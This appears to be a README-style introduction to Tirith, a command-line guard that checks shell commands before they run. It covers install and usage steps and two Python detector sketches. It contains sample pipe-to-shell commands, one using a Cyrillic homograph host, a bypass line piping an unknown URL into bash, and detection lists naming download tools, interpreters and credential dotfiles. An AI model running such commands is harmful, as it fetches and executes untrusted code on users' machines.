Tirith: Your Terminal Security Guard


Your browser catches malicious URLs. Your terminal doesn’t. That’s the problem Tirith solves. It sits between you and your shell, analyzing every command before execution to block homograph attacks, pipe-to-shell exploits, ANSI escape injection, and invisible Unicode threats. Zero friction on clean input. Invisible protection until it saves you.

Key Features

🔒 Homograph Attack Protection

Catches visually deceptive domains that use Cyrillic or Greek characters to mimic legitimate URLs:

$ curl -sSL https://іnstall.example-clі.dev | bash

tirith: BLOCKED
  [CRITICAL] non_ascii_hostname - Cyrillic і (U+0456) in hostname
    This is a homograph attack. The URL visually mimics a legitimate
    domain but resolves to a completely different server.

The command never executes. The attack is blocked before it can do harm.

🛡️ Terminal Injection Detection

Identifies ANSI escape sequences that rewrite your display, bidirectional overrides that reverse text, and zero-width characters hiding in domains.
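The checks from the two sections above, sketched as an added Python example (not Tirith's own code): it scans a command line for ESC, bidi and zero-width code points, then inspects each URL's hostname for non-ASCII letters, mixed scripts and punycode labels. Only `non_ascii_hostname` is a rule name from this page; the other labels, the URL regex and the second sample command are assumptions of this example.

```python
import re
import unicodedata
from urllib.parse import urlsplit

# Code points that change how a line is displayed without being visible.
CONTROL = {0x1B: "ansi_escape"}
CONTROL.update({cp: "zero_width" for cp in (0x200B, 0x200C, 0x200D, 0x2060, 0xFEFF)})
CONTROL.update({cp: "bidi_control" for cp in [*range(0x202A, 0x202F), *range(0x2066, 0x206A)]})
URL_RE = re.compile(r"https?://[^\s'\"|;<>]+")


def script_of(ch):
    """Script taken from the Unicode character name: LATIN, CYRILLIC, GREEK, ..."""
    return unicodedata.name(ch, "UNKNOWN").split()[0]


def scan_command(cmd):
    """Return (label, detail) findings for a command line without running it."""
    findings = [(CONTROL[ord(c)], f"U+{ord(c):04X} at offset {i}")
                for i, c in enumerate(cmd) if ord(c) in CONTROL]
    for url in URL_RE.findall(cmd):
        host = urlsplit(url).hostname or ""
        for label in host.split("."):
            letters = [c for c in label if c.isalpha()]
            for c in letters:
                if ord(c) > 127:
                    detail = f"{script_of(c).title()} {c} (U+{ord(c):04X}) in hostname"
                    findings.append(("non_ascii_hostname", detail))
            if len({script_of(c) for c in letters}) > 1:
                findings.append(("mixed_script_label", label))
            if label.startswith("xn--"):
                findings.append(("punycode_label", label))
    return findings


# Sample inputs: the first mirrors the blocked command above (escapes make the
# Cyrillic letters visible in source), the second is constructed, the third is clean.
SAMPLES = [
    "curl -sSL https://\u0456nstall.example-cl\u0456.dev | bash",
    "echo ok\x1b[2K\rcurl https://exam\u200bple.com/install.sh",
    "curl -fsSL https://get.docker.com | sh",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(sample), scan_command(sample))
```
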

📦 Pipe-to-Shell Warnings

Flags dangerous patterns like curl | bash and wget | sh while still allowing them to run (with a warning):

$ curl -fsSL https://get.docker.com | sh

tirith: WARNING
  [MEDIUM] pipe_to_interpreter - Download piped to interpreter
    Consider downloading first and reviewing.

🔐 Dotfile Protection

Blocks downloads targeting sensitive files like ~/.bashrc, ~/.ssh/authorized_keys, and ~/.gitconfig. These are blocked outright, not merely flagged with a warning.

🔍 30 Security Rules Across 7 Categories

  • Homograph attacks: Cyrillic/Greek lookalikes, punycode domains, mixed-script labels
  • Terminal injection: ANSI escapes, bidi overrides, zero-width characters
  • Pipe-to-shell: Every source-to-sink pattern covered
  • Dotfile attacks: Direct protection for sensitive config files
  • Insecure transport: Plain HTTP piped to shell, disabled TLS verification
  • Ecosystem threats: Git clone typosquats, untrusted Docker registries, pip/npm URL installs
  • Credential exposure: Userinfo tricks, shortened URLs hiding destinations
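How the pipe-to-shell, dotfile and insecure-transport categories can be checked from the command text alone, as an added Python example (not Tirith's implementation). It tokenizes the line like a shell, splits it into pipeline stages, and looks for a download stage feeding an interpreter or writing to a sensitive file. Only `pipe_to_interpreter` is a name from this page; the other labels, the program and flag lists, and the choice to let transport findings warn rather than block are assumptions of this example.

```python
import shlex
from itertools import groupby

FETCHERS = {"curl", "wget"}
INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "perl", "ruby", "node"}
DOTFILES = (".bashrc", ".zshrc", ".profile", ".gitconfig", ".ssh/authorized_keys")
NO_TLS_VERIFY = {"-k", "--insecure", "--no-check-certificate"}
WRITE_FLAGS = {"-o", "--output", "-O", "--output-document", ">", ">>"}


def split_pipeline(cmd):
    """Tokenize like a POSIX shell and group the tokens into pipeline stages."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    lexer.commenters = ""  # keep '#', so URL fragments are not cut off
    return [list(g) for is_pipe, g in groupby(lexer, lambda t: t == "|") if not is_pipe]


def analyze(cmd):
    """Return finding labels for one command line; nothing is executed."""
    findings, fetched = [], None
    for stage in split_pipeline(cmd):
        stage = [t for t in stage if t != "sudo"]  # look through a sudo prefix
        prog = stage[0].rsplit("/", 1)[-1] if stage else ""
        if prog in FETCHERS:  # source: a download stage
            fetched = stage
            if NO_TLS_VERIFY & set(stage):
                findings.append("tls_verification_disabled")
        elif fetched and prog in INTERPRETERS:  # sink: an interpreter
            findings.append("pipe_to_interpreter")
            if any(t.startswith("http://") for t in fetched):
                findings.append("plain_http_to_interpreter")
        if fetched:  # output flag or redirect aimed at a sensitive file
            for flag, target in zip(stage, stage[1:]):
                if flag in WRITE_FLAGS and target.endswith(DOTFILES):
                    findings.append("download_to_dotfile")
    return findings


def verdict(findings):  # dotfile writes block, every other finding only warns
    if "download_to_dotfile" in findings:
        return "BLOCKED"
    return "WARNING" if findings else "OK"


if __name__ == "__main__":
    for cmd in ("curl -fsSL https://get.docker.com | sh",  # from the page
                "wget -q https://example.com/keys -O ~/.ssh/authorized_keys"):  # constructed
        print(verdict(analyze(cmd)), analyze(cmd), cmd)
```
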

Platforms

  • 🍎 macOS - Homebrew, npm, Cargo
  • 🐧 Linux - apt/dnf, AUR, Nix, npm, Cargo
  • 🪟 Windows - Scoop, Chocolatey, npm, Cargo

Get Started

macOS (Homebrew)

brew install sheeki03/tap/tirith

Linux

Debian / Ubuntu:

# Download from GitHub Releases, then:
sudo dpkg -i tirith_*_amd64.deb

Fedora / RHEL / CentOS:

sudo dnf install ./tirith-*.rpm

Arch Linux:

yay -S tirith
# or: paru -S tirith

Cross-Platform

npm:

npm install -g tirith

Cargo:

cargo install tirith

Activate Tirith

Add to your shell profile to enable protection:

zsh (in ~/.zshrc):

eval "$(tirith init --shell zsh)"

bash (in ~/.bashrc):

eval "$(tirith init --shell bash)"

fish (in ~/.config/fish/config.fish):

tirith init --shell fish | source

CLI Commands

tirith check -- <cmd>

Analyze a command without executing it:

# The pipe is escaped so the shell hands it to tirith instead of piping tirith's output into bash
tirith check -- curl -sSL https://example.com \| bash

tirith score <url>

Break down a URL’s trust signals:

tirith score https://bit.ly/something

tirith diff <url>

Byte-level comparison showing suspicious characters:

tirith diff https://exаmple.com
# Position 3: expected 0x61 (Latin a) | got 0xd0 0xb0 (Cyrillic а)

tirith run <url>

Safe replacement for curl | bash. Downloads, shows SHA256, analyzes, opens in pager, executes only after confirmation:

tirith run https://get.docker.com

tirith receipt {last,list,verify}

Track and verify scripts run through tirith run:

tirith receipt last        # most recent receipt
tirith receipt list        # all receipts
tirith receipt verify <sha256>

tirith why

Explains the last rule that triggered and why.

tirith doctor

Diagnostic check - shows detected shell, hook status, policy file location.

Bypass (When You Know What You’re Doing)

TIRITH=0 curl -L https://something.xyz | bash

The variable only exists for that single command. Organizations can disable this entirely with allow_bypass: false in policy.

What Tirith Never Does

  • No network calls - all analysis is local
  • No command rewriting - never modifies what you typed
  • No telemetry - nothing leaves your machine
  • No background processes - invoked per-command, exits immediately
  • No cloud dependency - works offline, no accounts or API keys

🔗 Website: github.com/sheeki03/tirith

🔗 GitHub: github.com/sheeki03/tirith

Why This Tool Rocks

  • Invisible Protection: Zero output on normal commands - you forget it’s there until it saves you
  • Sub-Millisecond Overhead: No perceptible delay in your workflow
  • Local Analysis Only: No network calls, no cloud dependencies, works completely offline
  • Real Threats Blocked: Homograph attacks are real and dangerous - Tirith catches them before execution
  • Privacy First: No telemetry, no data collection, no accounts required
  • Configurable: YAML policy files for custom allowlists and severity overrides
  • Cross-Platform: Works on macOS, Linux, and Windows with all major shells

Crepi il lupo! 🐺